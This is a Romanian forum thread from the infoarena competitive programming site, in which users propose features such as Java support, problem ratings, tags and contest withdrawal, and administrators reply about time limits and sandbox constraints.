this may sound weird, stupid...or maybe both, dar ce ar fi sa facem un feature la IA cam cum e arena de la TC dar in care userii sa se poata provoca intre ei la un concurs si problemele sa fie selectate de server din arhiva a. i. sa nu fie rezolvate de nici unul dintre cei doi(sau mai multi) "playeri", cu alte cuvinte un feature care sa organizeze concursuri ad-hoc din problemele deja existente... Personal consider ca acest "add-on" ar motiva extrem de multa lume sa lucreze, pt ca apare o concurenta constanta....... Ce parere aveti? :-'


Titlul: Răspuns: Feature request
Scris de: Valentin Stanciu din Iulie 23, 2007, 16:55:53
Zic ca te-ai jucat prea mult pe calculator (nu stiu de ce am impresia asta :) )
Pana se implementeaza se pot face astfel de miniconcursuri la intelegere intre participanti. Pentru a face un astfel de sistem propus de tine cred ca ar fi nevoie de multa munca si cred ca timpul pentru a face acest feature este mai bine dedicat altor elemente. Oricum, multumim pentru sugestie; intodeauna se poate gasi un utilizator care sa stie sa programeze si sa observe un feature request care sa ii placa si sa il implementeze el :)

PS: sistemul ar putea fi pacalit oricum de 'playeri' cu conturi duble ;) Asta inseamna ca ar fi bine sa facem si un sistem anti-cheat


Titlul: Răspuns: Feature request
Scris de: HighScore din Iulie 23, 2007, 19:06:35
nu ma refeream neaparat la consola de la TC (care intradevar ar necesita extrem de mult timp pentru implementare). Ceva cam in genul intelegerii intre useri dar macar sa aiba monitorul de evaluare blocat pentru ei.


Titlul: Răspuns: Feature request
Scris de: nash mit din Noiembrie 05, 2007, 13:36:28
 Ar fi util daca ar fi acceptat si java pentru compilare . :) . Infoarena este pentru elevi si studenti si o parte din noi ( studenti ) ar dori sa implementeze si in java :) .


Titlul: Răspuns: Feature request
Scris de: Alexandru B. din Noiembrie 24, 2007, 22:56:17
ascultati-l ca are dreptate :).Si eu sunt de acord.Java are multe in comun cu C dar nu stiu cum o sa faceti evaluatorul.


Titlul: Răspuns: Feature request
Scris de: Cristian Strat din Noiembrie 25, 2007, 10:53:47
Ar fi util daca ar fi acceptat si java pentru compilare . :) . Infoarena este pentru elevi si studenti si o parte din noi ( studenti ) ar dori sa implementeze si in java :) .

Vrem si noi sa punem Java printre compilatoare dar nu am reusit sa facem un sandbox pentru JVM.
Daca te pricepi la Java, fa-l tu :)


Titlul: Răspuns: Feature request
Scris de: Gabriel Bitis din Decembrie 06, 2007, 22:32:26
S'ar putea crea o posibilitate de a renunta la inscrierea la concurs...
De exemplu daca ma inscriu la un concurs cu 3 zile inainte, si in seara dinaintea concursului aflu ca trebuie sa plec de acasa si nu mai am posibilitatea de a participa.... Ce fac in situatia asta?
Ma gandeam la optiunea de a renunta la concurs inainte de inceperea lui...


Titlul: Răspuns: Feature request
Scris de: Mircea Pasoi din Decembrie 06, 2007, 22:41:44
S'ar putea crea o posibilitate de a renunta la inscrierea la concurs...
De exemplu daca ma inscriu la un concurs cu 3 zile inainte, si in seara dinaintea concursului aflu ca trebuie sa plec de acasa si nu mai am posibilitatea de a participa.... Ce fac in situatia asta?
Ma gandeam la optiunea de a renunta la concurs inainte de inceperea lui...

In cazul in care crezi ca ar exista posiblitatea sa nu poti participa poti sa astepti cu inscrierea pana in ziua concursului.


Titlul: Răspuns: Feature request
Scris de: Gabriel Bitis din Decembrie 06, 2007, 22:44:42
Da.. ar fi si asta o varianta... dar cateodata esti sigur ca poti participa la concursul respectiv.. si te inscrii, cu 1 saptamana inainte...si intervine ceva neasteptat...
Ar fi dificil de bagat chestia asta?


Titlul: Răspuns: Feature request
Scris de: Mircea Pasoi din Decembrie 06, 2007, 22:50:00
Nu, nu cred ca ar fi prea dificil.


Titlul: Răspuns: Feature request
Scris de: Sima Cotizo din Decembrie 30, 2007, 14:20:15
Ma gandeam, ar fi util sa exista undeva pe pagina problemei si numarul ei? ... sau macar un link catre pagina din arhiva unde se gaseste problema...

Eu de exemplu am cautat o problema sa o citesc si am vrut sa vad si celelalte probleme date la runda respectiva de preONI (runda din anii trecuti) si ar fi fost mai usor sa le gasesc daca stiam ce nr are problema :)


Titlul: Răspuns: Feature request
Scris de: Florian Marcu din Decembrie 30, 2007, 16:08:34
Ca tot veni vorba, la topicurile deschise pt arhiva de probleme, ar fi bine daca, in primul post, in loc de cele trei puncte ("...") ati pune link catre problema.  :ok:


Titlul: Răspuns: Feature request
Scris de: Tataranu Vlad din Ianuarie 02, 2008, 16:20:48
Nu e tocmai un feature request, dar daca intrii direct pe forum nu te logheaza automat.


Titlul: Răspuns: Feature request
Scris de: Florian Marcu din Ianuarie 03, 2008, 09:26:15
Ba da..  :-k


Titlul: Răspuns: Feature request
Scris de: Sima Cotizo din Ianuarie 09, 2008, 18:22:27
Nu e tocmai o chestie necesara, dar am putea pune intrebari pe forum despre probleme de la ONI/OJI mai vechi pe forum, in sectiunea "Probleme externe"?

Stiu ca e boldat "fara solutii oficiale", dar de exemplu la problema desc de la 11-12 oni 2007 este data o solutie "completa", o sursa care ia 20p pe testele lor si... nimic mai mult... eu pana acum n-am avut idee de mai mult de 60p ...


Titlul: Răspuns: Feature request
Scris de: Mircea Pasoi din Ianuarie 09, 2008, 18:40:01
Nu e tocmai o chestie necesara, dar am putea pune intrebari pe forum despre probleme de la ONI/OJI mai vechi pe forum, in sectiunea "Probleme externe"?

Stiu ca e boldat "fara solutii oficiale", dar de exemplu la problema desc de la 11-12 oni 2007 este data o solutie "completa", o sursa care ia 20p pe testele lor si... nimic mai mult... eu pana acum n-am avut idee de mai mult de 60p ...

Pai daca problema e in arhiva poti intreba direct in topic-ul problemei, daca nu baga la probleme externe.


Titlul: Răspuns: Feature request
Scris de: Bondane Cosmin din Ianuarie 19, 2008, 15:49:20
In momentul in care primesti un PM sa fi anuntat si pe site.


Titlul: Răspuns: Feature request
Scris de: Tudor A din Martie 12, 2008, 01:20:01
feature request pentru oamenii lenesi:
sunt unele probleme de optimizare. eu as propune ca sa nu omorati programul fix dupa ce se termina timpul prestabilit pe test, ci la (125-150)% din el, iar daca programul reuseste sa scoata in timpul asta mai mare raspunsul corect, sa fie un output de genul "TLE+OK (not fast enough)". Daca programul scoate un raspuns gresit in timpul asta, sa scoata un output de genul "TLE+WA"... anyway, cred ca ati inteles unde vreau sa ajung. Ce ziceti?


Titlul: Răspuns: Feature request
Scris de: Maria Stanciu din Martie 12, 2008, 09:23:28
cand am lucrat primele probleme pe infoarena am secau TLE-urile si vroiam acelasi lucru ca si tine
acum cred ca deja iti poti da seama daca ideea ta e una corecta de rezolvare si daca rezolva toate cazurile fapt pt care realizezi singur ca ai fost "not fast enough"

nu mi se pare ca tu ai avea probleme de genul "nu-mi dau seama ca e corect rezolvata..."  :) si cu ce te-ar ajuta sa stii ca raspunsul e corect daca oricum nu-i destul de bine pt limita de timp?


Titlul: Răspuns: Feature request
Scris de: Tudor A din Martie 12, 2008, 12:10:36
am rezolvat copaci cu un algoritm care stiu ca e gresit, si totusi iau 90 de puncte, iar la ultimul test am 108 ms. vreau sa stiu daca e wa sau tle.


Titlul: Răspuns: Feature request
Scris de: Cristian Strat din Martie 12, 2008, 14:44:38
feature request pentru oamenii lenesi:
sunt unele probleme de optimizare. eu as propune ca sa nu omorati programul fix dupa ce se termina timpul prestabilit pe test, ci la (125-150)% din el, iar daca programul reuseste sa scoata in timpul asta mai mare raspunsul corect, sa fie un output de genul "TLE+OK (not fast enough)". Daca programul scoate un raspuns gresit in timpul asta, sa scoata un output de genul "TLE+WA"... anyway, cred ca ati inteles unde vreau sa ajung. Ce ziceti?

De obicei limitele de timp sunt deja umflate fata de cat ii trebuie solutiei oficiale sa ia punctaj maxim.

Daca nu ai un algoritm bun, cel mai probabil vei lua TLE indiferent de ce factor constant folosim.


Titlul: Răspuns: Feature request
Scris de: Tudorica Constantin Alexandru din Martie 16, 2008, 18:28:48
Un feature dragut ar fi ca undeva in headerul problemei sa scrie si cate puncte ai luat la ea.


Titlul: Răspuns: Feature request
Scris de: Sima Cotizo din Iunie 10, 2008, 22:01:38
In sectiunea "Articole" putem adauga solutiile de la concursuri "externe" gen ONI? Ma gandeam sa se faca un articol cu toate solutiile printate pe foi si lipite pe geamurile liceelor... :P


Titlul: Răspuns: Feature request
Scris de: Marginean Ninu Ciprian din Iunie 18, 2008, 07:51:33
Cred ca ar fi placut ca sa apara pe pagina problemei si numarul de ordine in arhiva(ex.:001.CMMDC).
Acesta poate fi pus langa titlu sau in header-ul cu fisierele de i/o, sursa etc.
Am nevoie de acest "feature" ca sa pot afla la ce clasa au fost date anumite probleme(la sursa scrie doar ONI2005 sau ceva similar).Alfel trebuie sa caut numele problemei in lista e probleme si sa ma uit acolo la clasa au fost date .Un astfel de index ar grabi cautarea.(L.E. Am observat ca nu e corect ce ziceam, dar mi-ar place asa ceva(indexul)) .
Multumesc.


Titlul: Răspuns: Feature request
Scris de: Sima Cotizo din Iunie 18, 2008, 08:42:40
Si eu cerusem asta mai sus cred, dar am vazut ca "se poate si altfel" : dai in jos in pagina pana in sectiunea cu forumul si posturile de pe forum contin si numarul problemei  :thumbup:

Cum ramane pana la urma cu solutiile de la ONI in articole ? :?


Titlul: Răspuns: Feature request
Scris de: Marginean Ninu Ciprian din Iunie 19, 2008, 06:09:28
ms :thumbup:


Titlul: Răspuns: Feature request
Scris de: Alexandru Simion din Iunie 19, 2008, 10:42:07
Cum ramane pana la urma cu solutiile de la ONI in articole ? :?

Nu inteleg utilitatea, atata timp cat ai arhivele cu probleme, teste, solutii (cele lipite pe geamurile scolii) la sectiunea "Downloads". De obicei cand vrei sa faci o problema de la oni, in caz ca nu e pe infoarena, iei toata arhiva. Si chiar daca e pe infoarena nu cred ca e cu mult mai greu sa intri la sectiunea "Downloads", decat la sectiunea "Articole".


Titlul: Răspuns: Feature request
Scris de: Sima Cotizo din Iunie 21, 2008, 10:32:20
Momentan nu sunt toate ONIurile (2007, 2008) la download. Si dupa parerea mea, decat sa descarci aprox. 10MB si apoi sa cauti in arhiva ce te intereseaza, e mai usor sa te duci la Articole > ONI 200x. Dar e doar parerea mea, stiu ca un impediment ar fi scrierea articolelor, care necesita timp si atentie :)

Am tras arhiva de la ONI 2008 (si am pus-o la downloads), dar mergea cu 60kB/s... uite de ce decat sa astept 3 minute si apoi sa "sap" prin arhiva, prefer sa ma uit pe infoarena direct  :thumbup:


Titlul: Răspuns: Feature request
Scris de: Popescu Silviu din Iulie 12, 2008, 16:30:33
Cum ar fi sa existe in descrierea fiecarei probleme, mai exact in tabelul in care sunt prevazute sursa si timul de executie pe test dificultatea problemei si ratingul dat de useri?
Adica sub "Timpul de executie pe test" sa mai fie "Dificultate " si sa scrie ceva gen usor, mediu, greu, olimpiada sau alte variante in functie de cum se crede mai bine.
Iar sub "Limita de memorie" sa mai fie "Rating" unde sa fie sa zicem 5 stele si in paranteza media. Stelele ar reactiona cand mouse-ul este deasupra si sa zicem daca tu crezi ca e de 3 stele pui mouse-ul pe a treia stea, moment in care primele 3 stele se coloreaza, si dai click si se inregistreaza votul. Rating-ul ar reprezenta cat de interesanta au considerat userii problema, sau cat de provocatoare...cat de mult le-a placut mai exact.


Titlul: Răspuns: Feature request
Scris de: Valentin Stanciu din Iulie 12, 2008, 18:46:15
Despre adaugarea dificultatii problemei s-a mai discutat. Dificultatea e subiectiva...
Insa, ideea de rating este buna.


Titlul: Răspuns: Feature request
Scris de: Popescu Silviu din Iulie 13, 2008, 07:13:42
Cred ca o idee buna ar mai fi si optiunea de sortare in lista cu solutiile unei probleme. Adica sa se poata sorta dupa Marime si Stare. Asa membrii site-ului pot sa aleaga mai repede solutiile care ocupa cel mai putin spatiu sau cele care au obtinut punctaj maxim. Ar face cautarea mai usoara.


Titlul: Răspuns: Feature request
Scris de: Simionescu Andrei din Iulie 24, 2008, 09:18:22
1. In arhiva de probleme, punctajul sa depinda de rating (apropo de ce s-a zis inaintea mea).
2. Tot in arhiva, sa existe 2 limite de timp, (multe probleme permit si rezolvari mai rapide) care sa dea punctaje diferite.
 :wink:


Titlul: Răspuns: Feature request
Scris de: Valentin Stanciu din Iulie 24, 2008, 20:03:25
Legat de pct 2: asa ceva exista deja dar sub alta forma. Testele la probleme sunt facute in asa fel incat sa iei punctaje diferite pentru algoritmi diferiti. Acesta este si scopul imbunatatirii testelor la probleme - sa se faca teste care sa evidentieze mai clar aceste diferente de rezolvari.
Cat despre pct 1, eu personal nu am inteles.


Titlul: Răspuns: Feature request
Scris de: Cezar Mocan din Iulie 25, 2008, 12:56:14
Cred ca punctul 1 se refera la urmatoarea chestie: fiecarei probleme sa i se acorde un rating, in functie de cat de multi utilizatori au rezolvat-o si cu cat o problema are un rating mai mare cu atat primesti mai multe puncte pe ea daca o rezolvi. Si atunci cand un nou user o rezolva ratingul ei scade. Cam asa cum e pe ACM MIPT.http://acm.mipt.ru/judge/problems.pl?CGISESSID=8eb879a06c89368ad3b2a70bad771b23 (http://acm.mipt.ru/judge/problems.pl?CGISESSID=8eb879a06c89368ad3b2a70bad771b23)


Titlul: Răspuns: Feature request
Scris de: Simionescu Andrei din Iulie 28, 2008, 19:09:47
Exact :D  Nu ca ar fi mare chestie punctajul pe arhiva de probleme, dar e usor aiurea sa iei 100 de puncte la problema cu adunare si tot 100 la una mult mai grea.

In legatura cu 2, ma gandeam la ceva de genul: "Timp limita: 0,2 s (50 pcte); 0,1 s (150 p)". Dar cred ca sistemul de rating ar fi suficient.


Titlul: Răspuns: Feature request
Scris de: Bondane Cosmin din Iulie 28, 2008, 21:47:04
Exact :D  Nu ca ar fi mare chestie punctajul pe arhiva de probleme, dar e usor aiurea sa iei 100 de puncte la problema cu adunare si tot 100 la una mult mai grea.

In legatura cu 2, ma gandeam la ceva de genul: "Timp limita: 0,2 s (50 pcte); 0,1 s (150 p)". Dar cred ca sistemul de rating ar fi suficient.

Avand in vedere ca punctajul din arhiva este doar unul statistic, aceasta departajare nu isi are rolul. Mai degraba ar merge in concursuri.


Titlul: Răspuns: Feature request
Scris de: Gabriel Bitis din Iulie 29, 2008, 00:42:24
Exact :D  Nu ca ar fi mare chestie punctajul pe arhiva de probleme, dar e usor aiurea sa iei 100 de puncte la problema cu adunare si tot 100 la una mult mai grea.

In legatura cu 2, ma gandeam la ceva de genul: "Timp limita: 0,2 s (50 pcte); 0,1 s (150 p)". Dar cred ca sistemul de rating ar fi suficient.
Sunt probleme dificile care au limita de 1s sau chiar mai mult, si probleme simple care au limita de 0.1s (cum sunt cele de la oji'uri). Nu cred ca limita de timp e cea care da "valoarea" unei probleme.


Titlul: Răspuns: Feature request
Scris de: Savin Tiberiu din Iulie 29, 2008, 09:48:33
probabil ca acel timp limita ar fi setat ptr fiecare problema separat. Insa oricum chestia asta e oarecum deja implementata dupa felul in care sunt facute testele. Probabil ca ar usura putin munca autorului unei probleme insa pare destul de complicat sa implementezi asa ceva.


Titlul: Răspuns: Feature request
Scris de: Sima Cotizo din Iulie 29, 2008, 13:22:05
Nu cumva ceea ce cere el este sa fie lasat programul sa ruleze, ca sa vada daca ia WA sau nu? Asta a mai fost cerut si mai inainte:

feature request pentru oamenii lenesi:
sunt unele probleme de optimizare. eu as propune ca sa nu omorati programul fix dupa ce se termina timpul prestabilit pe test, ci la (125-150)% din el, iar daca programul reuseste sa scoata in timpul asta mai mare raspunsul corect, sa fie un output de genul "TLE+OK (not fast enough)". Daca programul scoate un raspuns gresit in timpul asta, sa scoata un output de genul "TLE+WA"... anyway, cred ca ati inteles unde vreau sa ajung. Ce ziceti?

Cred ca asta tine de cum doreste autorul problemei sa faca testele. Daca se hotaraste ca in 50% din ele sa ia in considerare toate cazurile posibile, iar celelalte 50% sa fie teste foarte mari, atunci tu iti poti da seama din cele primele 50% daca ai algoritmul ok (scoate raspuns bun) si din celelalte daca trebuie o complexitate mai mica sau nu.


Titlul: Răspuns: Feature request
Scris de: Savin Tiberiu din Iulie 29, 2008, 14:16:38
cred mai mult ca el se referea la ceva de genu: "dak testul ruleaza in X secunde 10 puncte, daca testul ruleaza in K*X secunde 5 puncte".


Titlul: Răspuns: Feature request
Scris de: Sima Cotizo din Iulie 29, 2008, 21:54:02
cred mai mult ca el se referea la ceva de genu: "dak testul ruleaza in X secunde 10 puncte, daca testul ruleaza in K*X secunde 5 puncte".

Cel mai probabil (eu nu asta intelesesem  :thumbup:)... asta oricum cam e reformulare la ce a zis Tudor - in loc sa primeasca 0 pe TLE+WA sa primeasca 5p sau cam asa... Totusi, sunt probleme cu teste de 5p sau chiar 1p; cred ca nu e tocmai ok sa vezi punctaje cu virgula...  :-k

Eu raman la parerea lui Vali (ca deja sunt departajari facute de teste).


Titlul: Răspuns: Feature request
Scris de: Simionescu Andrei din August 18, 2008, 12:43:49
1.mi-am dat seama care ar fi cea mai utila chestie: niste categorii/taguri la arhiva de probleme
ex: pd, back, teoria grafurilor, geometrie etc etc

2.cat despre ce vroiam sa spun inainte, sa dau un exemplu concret:
avem o problema, oarecare, cu punctaj de 100 de puncte si limita de timp 0,2 s, suficienta pt o rezolvare medie
gigel stie o rezolvare mai rapida si toate testele ii intra in <0,05 s, dar primeste tot 100 p, asa ca ar vrea ca problema sa aiba o limita de timp la 0,05 s cu punctaj de 150p si sa-i apara, sa zicem, lui la probleme cu galben aia rezolvata vesel
daca intelegeti de aici, bine, daca nu, nu e mare lucru, ca scorul ala la arhiva tot nu inseamna nimic


Titlul: Răspuns: Feature request
Scris de: Simionescu Andrei din August 18, 2008, 12:49:30
Exact :D  Nu ca ar fi mare chestie punctajul pe arhiva de probleme, dar e usor aiurea sa iei 100 de puncte la problema cu adunare si tot 100 la una mult mai grea.

In legatura cu 2, ma gandeam la ceva de genul: "Timp limita: 0,2 s (50 pcte); 0,1 s (150 p)". Dar cred ca sistemul de rating ar fi suficient.

Avand in vedere ca punctajul din arhiva este doar unul statistic, aceasta departajare nu isi are rolul. Mai degraba ar merge in concursuri.

sunt de acord  :)

si, ca sa dezvolt pct. 1 din mesajul anterior, ar fi mult mai placut ca problemele sa aiba categorii si rating
ganditi-va cum ar fi: intri in arhiva, click pe "Categorii", click pe Teoria grafurilor si incepi sa rezolvi problemele, ordonate dupa rating.
asa ai (doar) problemele puse la gramada  :?


Titlul: Răspuns: Feature request
Scris de: Savin Tiberiu din August 18, 2008, 18:43:55
in concurs tot la gramada le primesti si nu iti zice nimeni dak se face cu geometrie, teoria grafurilor sau altceva. De aceea cei din echipa IA ink se gandesc cum sa faca aceste taguri. Spre exemplu am intalnit odata o problema care parea clar de geometrie (ceva cu un poligon pe acolo si niste axe de simetrie) si se facea cu suff-array, lucru la care in concurs nu m-as fi gandit niciodata.

Incercati sa va nu mai axati atat de tare sa implementati cat mai multi algoritmi clasici, teoretici. Incercati sa gasiti probleme la care sa va ganditi cat mai mult.


Titlul: Răspuns: Feature request
Scris de: Simionescu Andrei din Septembrie 17, 2008, 20:52:18
e posibil ca la un moment dat evaluatorul sa suporte si java (regret daca s-a mai adus in discutie acest "issue") ?


Titlul: Răspuns: Feature request
Scris de: Andrei Grigorean din Septembrie 19, 2008, 00:01:59
Nu cred. Gandeste-te cate probleme am intampina la fixarea limitei de timp, ca sa nu mai vorbim de limita de memorie. Pentru probleme de olimpiada, e cam dificil cu Java.


Titlul: Răspuns: Feature request
Scris de: Valentin Stanciu din Septembrie 19, 2008, 10:13:18
S-a mai discutat. Daca reușește să facă cineva să meargă jrun-ul cu java, includem și java printre compilatoare.


Titlul: Răspuns: Feature request
Scris de: Cristian Strat din Septembrie 22, 2008, 14:28:23
e posibil ca la un moment dat evaluatorul sa suporte si java (regret daca s-a mai adus in discutie acest "issue") ?

Asa cum a zis si Vali, jrun (http://hackers.devnet.ro/browser/trunk/jrun/) nu suporta inca Java. jrun (http://hackers.devnet.ro/browser/trunk/jrun/) blocheaza apeluri de sistem precum fork() sau execve() din motive de securitate; din pacate, masina virtuala de java are nevoie de astfel de apeluri ca sa functioneze. Sigur exista solutii insa noi nu stim care sunt acelea.

Am vrea sa oferim suport "neoficial" si pentru alte limbaje - macar Java si Python - chiar daca, asa cum bine zice Wefgef, nu vom putea garanta ca toate limitele de timp sunt fezabile pentru altceva decat C/Pascal.


Titlul: Răspuns: Feature request
Scris de: Savin Tiberiu din Septembrie 28, 2008, 11:46:48
Mie nu prea imi place macrou ala cu forum topic din pagina fiecarei probleme. Mi s-a intamplat de multe ori sa scrolez in jos sa vad exemplul si sa imi sara in ochi din ultimele mesaje de pe topic ori complexitatea, ori o metoda de rezolvare (dinamica, cautare binara etc), ori vreo structura de date folosita (deque, arbori de intervale etc), hinturi care strica tot farmecul problemei respective. Ar trebui lasat doar un link acolo catre topicul problemei de pe forum, insa chestia aia cu ultimele mesaje ma cam deranjeaza.


Titlul: Răspuns: Feature request
Scris de: Stefan Istrate din Septembrie 28, 2008, 13:04:00
Sau poate sa se modifice macroul si sa expandeze doar la click.


Titlul: Răspuns: Feature request
Scris de: Marginean Ninu Ciprian din Decembrie 08, 2008, 14:40:01
Mie mi-ar place un history la forum ca sa pot vedea ce topic-uri am citit in ultima zi/sapt/luna.


Titlul: Răspuns: Feature request
Scris de: Sima Cotizo din Decembrie 26, 2008, 23:52:40
Asta cred ca tine mai mult de SMF decat de infoarena :)

[LE] Ar fi util sa se modifice comanda de compilare astfel incat sa se includa si un define "__INFOARENA__" sau ceva de genul (mi se pare ca se poate). Asta ar da voie celor care trimit solutii sa foloseasca:

Cod:
#define MAX 300

#ifdef __INFOARENA__
#undef MAX
#define MAX 300000
#endif

Astfel ar putea face acasa debug pe un set mic de date fara sa "stea cu grija" sa refaca #def-ul de la inceput. Bineinteles, nu ar fi asa util pentru pregatirea de olimpiada, dar poate fi inclusa si acolo chestia asta :)


Titlul: Răspuns: Feature request
Scris de: Cristian Strat din Decembrie 30, 2008, 14:16:14
Ar fi util sa se modifice comanda de compilare astfel incat sa se includa si un define "__INFOARENA__" sau ceva de genul (mi se pare ca se poate). Asta ar da voie celor care trimit solutii sa foloseasca:

Cod:
#define MAX 300

#ifdef __INFOARENA__
#undef MAX
#define MAX 300000
#endif

Astfel ar putea face acasa debug pe un set mic de date fara sa "stea cu grija" sa refaca #def-ul de la inceput. Bineinteles, nu ar fi asa util pentru pregatirea de olimpiada, dar poate fi inclusa si acolo chestia asta :)

Ai putea sa folosesti #ifdef __LA_MINE_ACASA__  :)


Cristian


Titlul: Răspuns: Feature request
Scris de: Sima Cotizo din Decembrie 30, 2008, 17:40:05
:aha: Da, nu m-am gandit ca merge si invers. Multumesc.

Daca intereseaza pe cineva: se adauga la comanda de compilare si "-D __ACASA__", asta e echivalent cu a include "#define __ACASA__" in sursa. In Rhide, introduceti la "Options->Compiler options".


Titlul: Răspuns: Feature request
Scris de: Tataranu Vlad din Ianuarie 02, 2009, 12:13:22
:aha: Da, nu m-am gandit ca merge si invers. Multumesc.

Daca intereseaza pe cineva: se adauga la comanda de compilare si "-D __ACASA__", asta e echivalent cu a include "#define __ACASA__" in sursa. In Rhide, introduceti la "Options->Compiler options".


Cred ca e -D__ACASA__, fara spatiu ;)


Titlul: Răspuns: Feature request
Scris de: Sima Cotizo din Ianuarie 05, 2009, 09:38:37
Mi-a mers si cu spatiu.


Titlul: Răspuns: Feature request
Scris de: Andrei Misarca din Ianuarie 06, 2009, 23:51:42
Poate ca s-a mai zis... dar as propune ca la concursuri, problemele date la mai multe categorii, sa fie evaluate o singura data, astfel castigandu-se mai mult timp cu evaluarea. :D


Titlul: Răspuns: Feature request
Scris de: Silviu-Ionut Ganceanu din Ianuarie 07, 2009, 00:47:17
Incercam (http://infoarena.ro/forum/index.php?topic=3543.0) sa rezolvam asta dar aparent nu e simplu.


Titlul: Răspuns: Feature request
Scris de: Andrei Misarca din Ianuarie 07, 2009, 10:27:36
Ups. Scuze, n-am citit topicul ala.  :)


Titlul: Răspuns: Feature request
Scris de: Maria Stanciu din Februarie 15, 2009, 21:01:04
Am vazut de curand ca formatul paginilor care contin problemele din arhiva s-a modificat putin. Inainte exista jos un link catre discutiile de pe forum. Mi se parea foarte util pentru ca daca un utilizator citea enuntul si decidea ca are nevoie de sfaturi sau pur si simplu il intriga problema dadea click si vedea discutiile din topic. De ce a disparut aceasta optiune? Mi se pare mult mai greu sa cauti fiecare problema in forum.


Titlul: Răspuns: Feature request
Scris de: Andrei Grigorean din Februarie 15, 2009, 21:02:01
Nu a disparut, doar ca acum nu se mai considera ca primul post face parte din discutia problemei ;)


Titlul: Răspuns: Feature request
Scris de: Valentin Stanciu din Februarie 15, 2009, 21:04:25
Acum toata discutia de pe forum apare pe pagina sub forma de "comentarii". Trebuie doar sa ai javascript activat altfel iti apare "remote content".


Titlul: Răspuns: Feature request
Scris de: Andrei Grigorean din Februarie 15, 2009, 21:05:40
In plus, unele probleme inca nu au link catre forum. Avem nevoie de voluntari pentru asta :weightlift:


Titlul: Răspuns: Feature request
Scris de: Maria Stanciu din Februarie 15, 2009, 21:07:39
Aveti nevoie de voluntari care sa faca ce mai concret :)?


Titlul: Răspuns: Feature request
Scris de: Valentin Stanciu din Februarie 15, 2009, 21:11:51
Mereu va fi nevoie de voluntari, vezi http://infoarena.ro/implica-te/
Insa pentru cazul de fata avem nevoie de voluntari care sa se uite peste problemele din arhiva si sa le asocieze cu topicul vechi de pe forum. Am schimbat putin structura siteului si acum avem camp special in pagina pentru asa ceva doar ca trebuie adaugate de mana retroactiv.
Cred ca acest lucru intra la "Extinde arhiva". Ma insel?


Titlul: Răspuns: Feature request
Scris de: Bogdan-Cristian Tataroiu din Februarie 15, 2009, 21:14:16
Problemele nu sunt chiar editabile de catre altcineva decat admini :-'. Aveam un script care le asocia automat si din cate stiu eu in afara de problemele recente (de la stele de exemplu) toate au topicul asociat.


Titlul: Răspuns: Feature request
Scris de: Valentin Stanciu din Februarie 15, 2009, 21:15:14
Ah, scuze, am incurcat putin oalele.  :oops:


Titlul: Răspuns: Feature request
Scris de: Tataranu Vlad din Februarie 17, 2009, 17:35:37
La comentarii lista de pagini ar fi bine sa fie pusa si jos ca sa nu mai dai scroll inapoi ca sa treci la urmatoarea pagina


Titlul: Răspuns: Feature request
Scris de: Andrici Cezar din Martie 30, 2009, 21:35:57
As avea o sugestie...
Daca scrii un mesaj la o problema, trebuie sa cauti forumul vechi ca sa il modifici, nu s-ar putea face direct de pe pagina problemei?


Titlul: Răspuns: Feature request
Scris de: Razvan Darju din Noiembrie 16, 2009, 11:05:16
se va introduce candva si un evaluator pentru Java? stiu ca nu se face in liceu, dar ar fi bun pt studenti  :D


Titlul: Răspuns: Feature request
Scris de: Savin Tiberiu din Noiembrie 16, 2009, 11:22:55
Candva poate. Ceea ce pot insa sa iti zic este ca nu foarte curand (cel putin nu pana la 1 ianuarie 2010). Problema e ca Java este mult mai incet decat C/C++/Pascal deci ar trebui sa putem seta la probleme cate o limita de timp pentru fiecare limbaj in parte. Din pacate infoarena nu suporta inca un astfel de feature. Poti sa intri aici (http://hackers.devent.ro) pentru mai multe detalii despre chestiile la care se lucreaza in momentul de fata. De asemenea poti adauga acest lucru in lista de tickete si noi vom vedea ce putem face sau de ce nu sa implementezi chiar tu. Vei gasi pe acel site instructiuni despre cum poti lua codul infoarena si cum poti face patch-uri care sa ajunga pe live.


Titlul: Răspuns: Feature request
Scris de: Andrei Grigorean din Noiembrie 16, 2009, 12:58:33
Chiar daca am seta limitele pentru fiecare limbaj in parte, mie tot mi se pare improbabil sa adaugam Java (sau alte limbaje). Formatul in care se desfasoara momentan olimpiada pur si simplu nu se potriveste cu Java. Trebuie sa poti sa faci destul de clar diferenta intre algoritmi de complexitati apropiate. Este destul de greu sa faci asta si in C.


Titlul: Răspuns: Feature request
Scris de: Stefan-Alexandru Filip din Noiembrie 16, 2009, 13:32:09
S-a discutat relativ recent la una din sedintele infoarena si concluzia a fost ca ar fi foarte util pentru studenti, dar ca nu stie nimeni exact cum se face si nimeni nu are timp pentru asta. Se punea problema ca un laborant de la Politehnica sa se ocupe de jail-run pentru Java, dar nu stiu ce s-a intamplat in directia asta.


Titlul: Răspuns: Feature request
Scris de: Razvan Darju din Noiembrie 16, 2009, 17:32:40
O asemenea abordare exista deja la alte concursuri de algoritmi(google code jam, top coders..) deci nu mi se pare imposibil de realizat. O sa incerc sa ma documenteze mai bine in privinta asta si voi reveni cu detalii/sugestii. Multumesc pt raspunsul prompt :)


Titlul: Răspuns: Feature request
Scris de: Davide Vitelaru din Martie 04, 2010, 12:08:07
Puteti sa grupati si void problemele in functie de dificulatate? Este foarte stresant sa sar din problema in problema si sa observ ca are nevoie de cine stie ce ecuatie matematica. Imi mananca si mult din timp, in felul asta mai bine imi cumpar o culegere mai buna si am scapat de tot chinul.


Titlul: Răspuns: Feature request
Scris de: Florian Marcu din Martie 04, 2010, 15:20:26
in felul asta mai bine imi cumpar o culegere mai buna si am scapat de tot chinul.
Ia culegerea daca e mai bine. Daca ai fi avut curiozitatea sa te uiti un pic pe infoarena, ai fi observat ca subiectul asta a fost abordat de "n-shpe" mii de ori.


Titlul: Răspuns: Feature request
Scris de: Davide Vitelaru din Martie 04, 2010, 17:08:33
in felul asta mai bine imi cumpar o culegere mai buna si am scapat de tot chinul.
Ia culegerea daca e mai bine. Daca ai fi avut curiozitatea sa te uiti un pic pe infoarena, ai fi observat ca subiectul asta a fost abordat de "n-shpe" mii de ori.

Sunt nou, scuze de double-post.


Titlul: Răspuns: Feature request
Scris de: Andrei Grigorean din Martie 05, 2010, 15:31:17
Puteti sa grupati si void problemele in functie de dificulatate? Este foarte stresant sa sar din problema in problema si sa observ ca are nevoie de cine stie ce ecuatie matematica. Imi mananca si mult din timp, in felul asta mai bine imi cumpar o culegere mai buna si am scapat de tot chinul.

Echipa infoarena lucreaza la acest feature: http://infoarena.ro/forum/index.php?topic=4458.0


Titlul: Răspuns: Feature request
Scris de: Stanescu Malin Octavian din Martie 05, 2010, 15:45:21
